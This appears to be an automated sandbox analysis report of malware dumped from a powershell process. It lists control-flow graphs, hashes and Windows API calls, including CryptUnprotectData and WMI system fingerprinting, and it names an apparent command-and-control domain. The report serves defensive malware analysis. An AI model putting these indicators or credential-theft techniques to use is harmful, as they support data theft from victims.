14055->14068 14073 446520 14055->14073 14061 446520 LdrInitializeThunk 14056->14061 14057->14055 14057->14056 14057->14062 14057->14065 14057->14068 14069 446490 14057->14069 14059 446490 LdrInitializeThunk 14059->14065 14061->14065 14062->14068 14079 4431a0 LdrInitializeThunk 14062->14079 14064 446520 LdrInitializeThunk 14064->14065 14065->14059 14065->14062 14065->14064 14066 4461d0 LdrInitializeThunk 14065->14066 14065->14068 14080 4431a0 LdrInitializeThunk 14065->14080 14066->14065 14068->14050 14068->14068 14070 4464ce 14069->14070 14071 4464ae 14069->14071 14070->14055 14071->14070 14081 4431a0 LdrInitializeThunk 14071->14081 14074 44655f 14073->14074 14075 446539 14073->14075 14074->14056 14075->14074 14082 4431a0 LdrInitializeThunk 14075->14082 14077 446588 14077->14074 14083 4431a0 LdrInitializeThunk 14077->14083 14079->14068 14080->14065 14081->14070 14082->14077 14083->14074 13767 419456 13768 41945b 13767->13768 13773 441970 13768->13773 13770 41954d 13770->13770 13771 419476 13771->13770 13771->13771 13777 446320 13771->13777 13774 44199e 13773->13774 13775 441976 13773->13775 13774->13771 13775->13774 13781 4431a0 LdrInitializeThunk 13775->13781 13778 446340 13777->13778 13779 446438 13778->13779 13782 4431a0 LdrInitializeThunk 13778->13782 13779->13771 13781->13774 13782->13779 14089 40f497 14092 4136a0 14089->14092 14091 40f4a0 14102 4136b9 14092->14102 14093 4136c0 14093->14091 14095 415554 CreateProcessW 14095->14102 14096 413e63 RtlExpandEnvironmentStrings 14096->14102 14097 4431a0 LdrInitializeThunk 14097->14102 14098 4141a5 RtlExpandEnvironmentStrings 14098->14102 14099 413f95 RtlExpandEnvironmentStrings 14099->14102 14102->14093 14102->14095 14102->14096 14102->14097 14102->14098 14102->14099 14103 441620 RtlFreeHeap 14102->14103 14104 40b240 14102->14104 14108 446060 14102->14108 14112 446610 14102->14112 14103->14102 14107 40b2d0 14104->14107 14105 40b2f5 14105->14102 14106 443140 2 API calls 14106->14105 14107->14105 14107->14106 14110 446080 14108->14110 14109 44616e 14109->14102 14110->14109 14118 4431a0 LdrInitializeThunk 14110->14118 14113 44664f 14112->14113 14114 446629 14112->14114 14113->14102 14114->14113 14119 4431a0 LdrInitializeThunk 14114->14119 14116 446678 14116->14113 14120 4431a0 LdrInitializeThunk 14116->14120 14118->14109 14119->14116 14120->14113 14121 435499 CoSetProxyBlanket 13783 43d55f 13785 43d577 13783->13785 13784 43d585 GetUserDefaultUILanguage 13786 43d5ca 13784->13786 13785->13784 14122 443999 14123 4439b5 14122->14123 14124 4439ce 14122->14124 14123->14124 14126 4431a0 LdrInitializeThunk 14123->14126 14126->14124 13787 422d5c 13788 446320 LdrInitializeThunk 13787->13788 13789 422d65 13788->13789 13790 446320 LdrInitializeThunk 13789->13790 13791 422d79 13790->13791 13792 43e0e0 13793 43e108 13792->13793 13795 43e1a8 13793->13795 13801 4431a0 LdrInitializeThunk 13793->13801 13797 43e2e2 13795->13797 13799 43e235 13795->13799 13800 4431a0 LdrInitializeThunk 13795->13800 13799->13797 13802 4431a0 LdrInitializeThunk 13799->13802 13800->13795 13801->13793 13802->13799 13803 441660 13804 44167e 13803->13804 13806 44169e 13803->13806 13804->13806 13811 4431a0 LdrInitializeThunk 13804->13811 13808 441847 13806->13808 13810 44175e 13806->13810 13812 4431a0 LdrInitializeThunk 13806->13812 13813 441620 13810->13813 13811->13806 13812->13810 13814 441650 13813->13814 13815 441633 13813->13815 13814->13808 13816 441638 RtlFreeHeap 13815->13816 13816->13814 14127 40f025 CoInitializeSecurity 13817 437864 13818 4378b7 13817->13818 13818->13818 13819 43792c SysAllocString 13818->13819 13820 437b44 13819->13820 13821 4399eb 13822 439a01 13821->13822 13825 43a420 13822->13825 13827 43a460 GetObjectW 13825->13827 13828 43a571 13827->13828 14128 4359ab SysFreeString 14129 435bc6 14128->14129 14130 443b2e 14131 443b38 14130->14131 14132 443c0e 14131->14132 14134 4431a0 LdrInitializeThunk 14131->14134 14134->14132 13829 40ce6b 13830 40cec6 13829->13830 13831 40cede 13829->13831 13830->13831 13833 4431a0 LdrInitializeThunk 13830->13833 13833->13831 14135 40db30 14136 40db46 14135->14136 14139 43e350 14136->14139 14138 40dc3e 14138->14138 14140 43e3a0 14139->14140 14140->14140 14141 43e734 CoCreateInstance 14140->14141 14142 43ed06 14141->14142 14143 43e78f SysAllocString 14141->14143 14144 43ed16 GetVolumeInformationW 14142->14144 14146 43e80f 14143->14146 14154 43ed38 14144->14154 14147 43e817 CoSetProxyBlanket 14146->14147 14148 43ecf5 SysFreeString 14146->14148 14149 43e837 SysAllocString 14147->14149 14150 43eceb 14147->14150 14148->14142 14152 43e930 14149->14152 14150->14148 14152->14152 14153 43e98f SysAllocString 14152->14153 14156 43e9b7 14153->14156 14154->14138 14155 43ecd9 SysFreeString SysFreeString 14155->14150 14156->14155 14157 43eccf SysFreeString 14156->14157 14158 43e9ff VariantInit 14156->14158 14157->14155 14160 43ea60 14158->14160 14159 43ecbe VariantClear 14159->14157 14160->14159 14161 4435b6 14163 4435de 14161->14163 14164 4435c0 14161->14164 14162 443d62 14163->14162 14168 4431a0 LdrInitializeThunk 14163->14168 14164->14163 14167 4431a0 LdrInitializeThunk 14164->14167 14167->14163 14168->14162 13834 43d1ff 13835 43d203 13834->13835 13836 43d20b 13835->13836 13838 4431a0 LdrInitializeThunk 13835->13838 13838->13835
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $ $"$%$&$($($+$,$,$-$.$/$/$0$2$3$3$6$7$:$:$;$=$=$>$@$@$@$A$A$B$C$C$D$D$D$D$E$F$G$H$I$J$K$L$M$N$O$O$O$Q$R$R$R$S$X$Z$\$\$^$^$_$_$`$`$b$c$d$e$f$f$g$h$h$j$l$m$n$n$o$s$x$x$x$y$y$y$y$z${$|$~$~
                                                                                                    • API String ID: 0-4211698226
                                                                                                    • Opcode ID: 456ec2c47d57a2467ae274b2634d93ed1616a66af1f708fe66359f359bceadd8
                                                                                                    • Instruction ID: c637433f010cd3fb7c4deab1b282b826455f26d3959bf23c06ce429c8961f346
                                                                                                    • Opcode Fuzzy Hash: 456ec2c47d57a2467ae274b2634d93ed1616a66af1f708fe66359f359bceadd8
                                                                                                    • Instruction Fuzzy Hash: 0C03CF7150C7C08AD3349B3884983EFBBD1ABD6314F184A6EE4E9873D2D7798585874B

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 494 43e350-43e394 495 43e3a0-43e3f8 494->495 495->495 496 43e3fa-43e427 495->496 497 43e430-43e442 496->497 497->497 498 43e444-43e4a2 497->498 499 43e4b0-43e4c2 498->499 499->499 500 43e4c4-43e4e3 499->500 502 43e593-43e5a4 500->502 503 43e4e9-43e4f8 500->503 504 43e5b0-43e5ce 502->504 505 43e500-43e54a 503->505 504->504 506 43e5d0-43e633 504->506 505->505 507 43e54c-43e568 505->507 508 43e640-43e684 506->508 509 43e570-43e584 507->509 508->508 510 43e686-43e6e3 508->510 509->509 511 43e586-43e58b 509->511 512 43e6f0-43e732 510->512 511->502 512->512 513 43e734-43e789 CoCreateInstance 512->513 514 43ed06-43ed36 call 444c10 GetVolumeInformationW 513->514 515 43e78f-43e7cf 513->515 520 43ed40-43ed42 514->520 521 43ed38-43ed3c 514->521 517 43e7d0-43e7e4 515->517 517->517 519 43e7e6-43e811 SysAllocString 517->519 526 43e817-43e831 CoSetProxyBlanket 519->526 527 43ecf5-43ed02 SysFreeString 519->527 522 43ed67-43ed6e 520->522 521->520 524 43ed70-43ed77 522->524 525 43ed87-43edbb 522->525 524->525 528 43ed79-43ed85 524->528 529 43edc0-43ede9 525->529 530 43e837-43e85f 526->530 531 43eceb-43ecf1 526->531 527->514 528->525 529->529 532 43edeb-43ee21 529->532 533 43e860-43e890 530->533 531->527 534 43ee30-43eee1 532->534 533->533 535 43e892-43e921 SysAllocString 533->535 534->534 537 43eee7-43ef19 call 41f460 534->537 536 43e930-43e98d 535->536 536->536 538 43e98f-43e9bd SysAllocString 536->538 541 43ef20-43ef28 537->541 544 43e9c3-43e9e5 538->544 545 43ecd9-43ece8 SysFreeString * 2 538->545 541->541 543 43ef2a-43ef38 541->543 546 43ed50-43ed61 543->546 547 43ef3e-43ef4e call 4082a0 543->547 552 43e9eb-43e9ee 544->552 553 43eccf-43ecd6 SysFreeString 544->553 545->531 546->522 549 43ef53-43ef5a 546->549 547->546 552->553 554 43e9f4-43e9f9 552->554 553->545 554->553 555 43e9ff-43ea5f VariantInit 554->555 556 43ea60-43ea99 555->556 556->556 557 43ea9b-43eab9 556->557 559 43eabf-43eac8 557->559 560 43ecbe-43eccb VariantClear 557->560 559->560 561 43eace-43eadb 559->561 560->553 562 43eb1d 561->562 563 43eadd-43eae2 561->563 565 43eb1f-43eb39 call 408220 562->565 564 43eafc-43eb00 563->564 566 43eb02-43eb0b 564->566 567 43eaf0 564->567 574 43ec64-43ec75 565->574 575 43eb3f-43eb49 565->575 570 43eb12-43eb16 566->570 571 43eb0d-43eb10 566->571 569 43eaf1-43eafa 567->569 569->564 569->565 570->569 573 43eb18-43eb1b 570->573 571->569 573->569 576 43ec77 574->576 577 43ec7c-43ec92 574->577 575->574 578 43eb4f-43eb57 575->578 576->577 579 43ec94 577->579 580 43ec99-43ecbb call 408250 call 408230 577->580 581 43eb60-43eb6a 578->581 579->580 580->560 583 43eb80-43eb86 581->583 584 43eb6c-43eb71 581->584 586 43eba4-43ebb0 583->586 587 43eb88-43eb8b 583->587 585 43ec10-43ec16 584->585 593 43ec18-43ec1e 585->593 590 43ebb2-43ebb5 586->590 591 43ec2a-43ec32 586->591 587->586 589 43eb8d-43eba2 587->589 589->585 590->591 594 43ebb7-43ec02 590->594 597 43ec34-43ec36 591->597 598 43ec38-43ec3b 591->598 593->574 596 43ec20-43ec22 593->596 594->585 596->581 599 43ec28 596->599 597->593 600 43ec60-43ec62 598->600 601 43ec3d-43ec5e 598->601 599->574 600->585 601->585
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(8C8F8EA9,00000000,00000001,?,00000000), ref: 0043E77E
                                                                                                    • SysAllocString.OLEAUT32(63AD61B2), ref: 0043E7EB
                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043E829
                                                                                                    • SysAllocString.OLEAUT32(64B66682), ref: 0043E897
                                                                                                    • SysAllocString.OLEAUT32(CDB1D3A1), ref: 0043E994
                                                                                                    • VariantInit.OLEAUT32(?), ref: 0043EA07
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0043ECD6
                                                                                                    • SysFreeString.OLEAUT32(C19AC7E6), ref: 0043ECE0
                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0043ECE6
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0043ECF6
                                                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043ED32
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String$Free$Alloc$BlanketCreateInformationInitInstanceProxyVariantVolume
                                                                                                    • String ID: 23<=$Gslm$p_]$tu$x<
                                                                                                    • API String ID: 3857627774-335005638
                                                                                                    • Opcode ID: 256e65e76bed38c16e48230b01f4b373bf250eece8b119e4e9d1c8af5bd2bc92
                                                                                                    • Instruction ID: dc2a2897c2ab1a0c69cbb615990ef325a579a204f551d78b51a74e10e2106dde
                                                                                                    • Opcode Fuzzy Hash: 256e65e76bed38c16e48230b01f4b373bf250eece8b119e4e9d1c8af5bd2bc92
                                                                                                    • Instruction Fuzzy Hash: E162DD726093418FD324CF29C88575BBBE2EFD9314F18992DE5988B381D778D8058B96

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 619 426dd0-426e46 620 426e50-426eb6 619->620 620->620 621 426eb8-426f01 RtlExpandEnvironmentStrings 620->621 622 426f10-426f4a 621->622 622->622 623 426f4c-426f57 622->623 624 426fb3-426fbf 623->624 625 426fc0-426fc8 623->625 626 427100-427108 623->626 627 4270f0-4270f7 623->627 628 426fa7-426fb0 call 408230 623->628 629 4272a5-427354 623->629 630 42728a 623->630 631 427278-427282 623->631 632 426f5e-426f63 623->632 633 426f9f 623->633 640 426fd1 625->640 641 426fca-426fcf 625->641 634 427111 626->634 635 42710a-42710f 626->635 627->626 628->624 638 427360-42738e 629->638 631->630 636 426f65-426f6a 632->636 637 426f6c 632->637 633->628 643 427118-4271cf call 408220 634->643 635->643 644 426f6f-426f98 call 408220 RtlExpandEnvironmentStrings 636->644 637->644 638->638 645 427390-42739c call 4231d0 638->645 642 426fd8-427017 call 408220 640->642 641->642 655 427020-42706c 642->655 656 4271d0-4271fc 643->656 644->624 644->625 644->626 644->627 644->628 644->629 644->630 644->631 644->633 654 4273a1-4273a4 645->654 655->655 657 42706e-42707e 655->657 656->656 658 4271fe-427206 656->658 659 427080-427085 657->659 660 4270a1-4270ae 657->660 661 427221-42722e 658->661 662 427208-42720f 658->662 663 427090-42709f 659->663 664 4270b0-4270b4 660->664 665 4270d1-4270dc call 446320 660->665 667 427230-427234 661->667 668 427251-427271 GetLogicalDrives call 446320 661->668 666 427210-42721f 662->666 663->660 663->663 669 4270c0-4270cf 664->669 673 4270e1-4270e9 665->673 666->661 666->666 671 427240-42724f 667->671 668->630 668->631 669->665 669->669 671->668 671->671 673->626 673->627 673->629 673->630 673->631
                                                                                                    APIs
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00426EEC
                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,Eg`!), ref: 00426F8D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                    • String ID: 'uB$CM$Eg`!$Eg`!$Xm$b
                                                                                                    • API String ID: 237503144-2216034328
                                                                                                    • Opcode ID: f5c895c666e51946cb21872e5c1d9f92cb2d84294b0089706533e6929260a75f
                                                                                                    • Instruction ID: 076aa901f1a4f25b394487570d8f7e5d1385a2469da7301942de1d7069ea31dd
                                                                                                    • Opcode Fuzzy Hash: f5c895c666e51946cb21872e5c1d9f92cb2d84294b0089706533e6929260a75f
                                                                                                    • Instruction Fuzzy Hash: A5E102B560C3108FD310DF68D89166BB7E2EFC5304F49892DF5848B392EB799909CB5A

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 679 40e6ca-40e701 call 409880 CoUninitialize 682 40e710-40e789 679->682 682->682 683 40e78b-40e7af 682->683 684 40e7b0-40e7cc 683->684 684->684 685 40e7ce-40e821 684->685 686 40e830-40e857 685->686 686->686 687 40e859-40e863 686->687 688 40e865-40e86a 687->688 689 40e87b-40e886 687->689 690 40e870-40e879 688->690 691 40e888-40e88f 689->691 692 40e89d 689->692 690->689 690->690 693 40e890-40e899 691->693 694 40e8a0-40e8aa 692->694 693->693 695 40e89b 693->695 696 40e8ac-40e8b4 694->696 697 40e8cd-40e8d0 694->697 695->694 698 40e8c0-40e8c9 696->698 699 40e8d2-40e8df 697->699 698->698 700 40e8cb 698->700 701 40e8e1-40e8e2 699->701 702 40e8fb-40e906 699->702 700->699 703 40e8f0-40e8f9 701->703 704 40e908-40e90b 702->704 705 40e91b-40e927 702->705 703->702 703->703 706 40e910-40e919 704->706 707 40e941-40ea1a 705->707 708 40e929-40e92b 705->708 706->705 706->706 710 40ea20-40ea41 707->710 709 40e930-40e93d 708->709 709->709 711 40e93f 709->711 710->710 712 40ea43-40ea7f 710->712 711->707 713 40ea80-40eb0b 712->713 713->713 714 40eb11-40eb72 call 40b910 call 409880 CoUninitialize 713->714 719 40eb80-40ebf9 714->719 719->719 720 40ebfb-40ec1f 719->720 721 40ec20-40ec3c 720->721 721->721 722 40ec3e-40ec91 721->722 723 40eca0-40ecc7 722->723 723->723 724 40ecc9-40ecd3 723->724 725 40ecd5-40ecda 724->725 726 40eceb-40ecf6 724->726 727 40ece0-40ece9 725->727 728 40ecf8-40ecff 726->728 729 40ed0d 726->729 727->726 727->727 730 40ed00-40ed09 728->730 731 40ed10-40ed1a 729->731 730->730 732 40ed0b 730->732 733 40ed1c-40ed24 731->733 734 40ed3d-40ed40 731->734 732->731 735 40ed30-40ed39 733->735 736 40ed42-40ed4f 734->736 735->735 737 40ed3b 735->737 738 40ed51-40ed52 736->738 739 40ed6b-40ed76 736->739 737->736 742 40ed60-40ed69 738->742 740 40ed78-40ed7b 739->740 741 40ed8b-40ed97 739->741 743 40ed80-40ed89 740->743 744 40edb1-40ee8a 741->744 745 40ed99-40ed9b 741->745 742->739 742->742 743->741 743->743 747 40ee90-40eeb1 744->747 746 40eda0-40edad 745->746 746->746 748 40edaf 746->748 747->747 749 40eeb3-40eeef 747->749 748->744 750 40eef0-40ef7b 749->750 750->750 751 40ef81-40efbd call 40b910 750->751
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Uninitialize
                                                                                                    • String ID: 2x$quantitypitt.click$u}$wrq|$}t
                                                                                                    • API String ID: 3861434553-908270138
                                                                                                    • Opcode ID: e4fabe09f52ee5eef4858d0713cb36d32accb540f3329c243a1674b1dbfc2d50
                                                                                                    • Instruction ID: 8b73f0d1174d5268f2e606b705f583685bf4766d9cc50043663b6e223f1673ff
                                                                                                    • Opcode Fuzzy Hash: e4fabe09f52ee5eef4858d0713cb36d32accb540f3329c243a1674b1dbfc2d50
                                                                                                    • Instruction Fuzzy Hash: AB3205756047408FD719CF29C4A0366BFE2EF96304F2885ADC8968F796C77AD806CB54

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 875 408900-408911 call 4427d0 878 408bb5-408bb7 ExitProcess 875->878 879 408917-40891e call 43bb60 875->879 882 408bb0 call 443120 879->882 883 408924-408947 GetCurrentProcessId GetCurrentThreadId 879->883 882->878 885 408949-40894b 883->885 886 40894d-408a0c SHGetSpecialFolderPathW GetForegroundWindow 883->886 885->886 887 408a12-408a8c 886->887 888 408a0e-408a10 886->888 889 408a8e-408aa7 887->889 888->889 890 408ab0-408aca 889->890 890->890 891 408acc-408afa call 441600 890->891 894 408b00-408b3b 891->894 895 408b74-408b92 call 409e40 894->895 896 408b3d-408b72 894->896 899 408b94 call 40ce40 895->899 900 408b9e-408ba5 895->900 896->894 904 408b99 call 40b8e0 899->904 900->882 901 408ba7-408bad call 408230 900->901 901->882 904->900
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00408924
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0040892D
                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089EF
                                                                                                    • GetForegroundWindow.USER32 ref: 00408A04
                                                                                                    • ExitProcess.KERNEL32 ref: 00408BB7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4063528623-0
                                                                                                    • Opcode ID: 3cc8f1d6a74f06992084d268b8ecd5e1b52f8552c025b311bb0548be286e124b
                                                                                                    • Instruction ID: 7e0d9d0b638db2d8e8a6e3d11cdd78ef90fec10388e6696b19a304e3dfa24fe1
                                                                                                    • Opcode Fuzzy Hash: 3cc8f1d6a74f06992084d268b8ecd5e1b52f8552c025b311bb0548be286e124b
                                                                                                    • Instruction Fuzzy Hash: 4C615973B543140BD318AA798D5635AB6C69BC5710F0F823EA984EB3D5ED7C9C028689

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 907 411c93-411cae 908 411cb3-411cbd 907->908 908->908 909 411cbf 908->909 910 411cc1-411cc4 909->910 911 411cc6-411d29 910->911 912 411d2b-411d5c call 4018d0 910->912 911->910 915 411d62-411d65 912->915 916 411db3-411dda call 4018d0 915->916 917 411d67-411db1 915->917 920 411ddc-411ebb call 415700 916->920 921 411dde-411de1 916->921 917->915 928 411ebd 920->928 929 411ebf-411f14 call 408220 call 40aa50 920->929 923 4129ad 921->923 925 413681-413687 923->925 927 413689-41368c call 401f60 925->927 935 40fec0-41369d 927->935 936 40fec7-40fefd call 401f70 927->936 928->929 942 411f19-411f23 929->942 943 40ff02-40ff0c 936->943 942->942 944 411f25-411f27 942->944 943->943 945 40ff0e 943->945 946 411f2a-411f2d 944->946 947 40ff10-40ff13 945->947 948 411f33-411fc9 946->948 949 411fce-411fec call 4018d0 946->949 950 40ff55-40ff7f call 401e60 947->950 951 40ff15-40ff53 947->951 948->946 956 41204c-412096 call 415700 949->956 957 411fee-412015 call 415700 949->957 959 40ff81-40ffa9 950->959 960 40ff83-40ff89 950->960 951->947 965 412098 956->965 966 41209a-412136 call 408220 call 40aa50 RtlExpandEnvironmentStrings 956->966 967 412017 957->967 968 412019-41204a call 408220 call 40aa50 957->968 969 40ffae-40ffb8 959->969 960->927 965->966 984 41213b-412145 966->984 967->968 968->956 969->969 972 40ffba 969->972 975 40ffbc-40ffbf 972->975 978 40ffc1-40ffd4 975->978 979 40ffd6-41001a call 4019d0 975->979 978->975 979->925 987 410020-410027 979->987 984->984 986 412147 984->986 988 412149-41214c 986->988 987->925 989 41218e-412196 988->989 990 41214e-41218c 988->990 991 4121b5-4121cf 989->991 992 412198-4121b0 call 408230 989->992 990->988 993 4121d1 991->993 994 4121d3-412223 call 408220 RtlExpandEnvironmentStrings 991->994 992->923 993->994 1001 412225-412255 call 408230 * 2 994->1001 1002 41225a-41228b call 408230 994->1002 1020 4129ab 1001->1020 1009 412290-41229a 1002->1009 1009->1009 1011 41229c 1009->1011 1013 41229e-4122a1 1011->1013 1015 4122a3-4122d2 1013->1015 1016 4122d4-4122f0 call 4018d0 1013->1016 1015->1013 1022 412353-41236e 1016->1022 1023 4122f2-41231b call 415700 1016->1023 1020->923 1024 412373-41237d 1022->1024 1029 41231d 1023->1029 1030 41231f-412350 call 408220 call 40aa50 1023->1030 1024->1024 1026 41237f 1024->1026 1028 412381-412384 1026->1028 1032 4123b0-4123ec call 401bd0 1028->1032 1033 412386-4123ae 1028->1033 1029->1030 1030->1022 1039 4123f1-4123fb 1032->1039 1033->1028 1039->1039 1040 4123fd 1039->1040 1041 4123ff-412402 1040->1041 1042 412404-41243c 1041->1042 1043 41243e-41245f call 401ae0 1041->1043 1042->1041 1046 412465-412497 call 401f60 1043->1046 1047 412884-4128e2 call 408d80 call 416530 1043->1047 1053 412499 1046->1053 1054 41249b-4124b7 call 408220 1046->1054 1055 4128e7-4128f7 call 409880 1047->1055 1053->1054 1060 4124b9-4124c0 1054->1060 1061 4124d8-4124e0 1054->1061 1063 4128f9-412908 1055->1063 1064 41292f-412969 call 408230 * 2 1055->1064 1065 4124c2-4124ce call 4157d0 1060->1065 1062 4124e2-4124e4 1061->1062 1066 4124e6 1062->1066 1067 4124eb-412525 call 401f70 1062->1067 1069 41290a 1063->1069 1070 41291d-41292d call 408230 1063->1070 1095 412980-41298b 1064->1095 1096 41296b-41297e call 408230 1064->1096 1081 4124d0-4124d6 1065->1081 1066->1047 1083 41252a-412534 1067->1083 1075 41290c-412919 call 415950 1069->1075 1070->1064 1088 41291b 1075->1088 1081->1061 1083->1083 1086 412536 1083->1086 1089 412538-41253b 1086->1089 1088->1070 1091 412580-4125ba call 4018d0 1089->1091 1092 41253d-41257e 1089->1092 1102 4125bc-4125bf 1091->1102 1092->1089 1100 4129a0-4129a6 call 408e60 1095->1100 1101 41298d-41299d call 408230 1095->1101 1096->1095 1100->1020 1101->1100 1106 4125c1-412612 1102->1106 1107 412614-412658 call 4018d0 1102->1107 1106->1102 1113 41265d-412667 1107->1113 1113->1113 1114 412669 1113->1114 1115 41266b-41266e 1114->1115 1116 412743-412782 call 401bd0 1115->1116 1117 412674-41273e 1115->1117 1120 412787-412791 1116->1120 1117->1115 1120->1120 1121 412793 1120->1121 1122 412795-412798 1121->1122 1123 41279a-4127fb 1122->1123 1124 4127fd-41287f call 401bd0 call 4157f0 1122->1124 1123->1122 1124->1062
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 164f2d4483a4db1cf5b973241d57934aaa954c4d97a743ea8d5a6a7aac6b9fcc
                                                                                                    • Instruction ID: 9e8aa4793be24100f2d6c1bfa84d6e1427b838c930f92fe4e134f314e2954676
                                                                                                    • Opcode Fuzzy Hash: 164f2d4483a4db1cf5b973241d57934aaa954c4d97a743ea8d5a6a7aac6b9fcc
                                                                                                    • Instruction Fuzzy Hash: 8E82F7B1604B408FD724DF3CC9913A6BBE1AB95324F188A3ED4ABC73D2D679A445C706
                                                                                                    APIs
                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00416E63
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CryptDataUnprotect
                                                                                                    • String ID:
                                                                                                    • API String ID: 834300711-0
                                                                                                    • Opcode ID: 4cee28e6f9bb2de3c9806c57d080082401344670bb8655e6757673c58df678ed
                                                                                                    • Instruction ID: 15dae543d96169eacf19d9debb39142cc765ec0f849f5c00149ee5a3528ee034
                                                                                                    • Opcode Fuzzy Hash: 4cee28e6f9bb2de3c9806c57d080082401344670bb8655e6757673c58df678ed
                                                                                                    • Instruction Fuzzy Hash: AF5107B56082419FC714CF28D4916ABFBE2ABD5304F598A2EE4D987341E738DC45CB86
                                                                                                    APIs
                                                                                                    • LdrInitializeThunk.NTDLL(004462FD,?,00000018,?,?,00000018,?,?,?), ref: 004431CE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 481 437864-4378b2 482 4378b7-4378c5 481->482 482->482 483 4378c7 482->483 484 4378c9-4378cc 483->484 485 4378ce-43792a 484->485 486 43792c-437b3f SysAllocString 484->486 485->484 487 437b44-437b52 486->487 487->487 488 437b54-437b5a 487->488 489 437b61-437b64 488->489 490 437b66-437bd7 489->490 491 437bd9-437c16 489->491 490->489 493 437c20-437c56 491->493
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2747633949.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocString
                                                                                                    • String ID: !$#$$$%$0$1$3$5$7$9$;$=$?$[$\$c$f$g$h$n$z
                                                                                                    • API String ID: 2525500382-1096057499
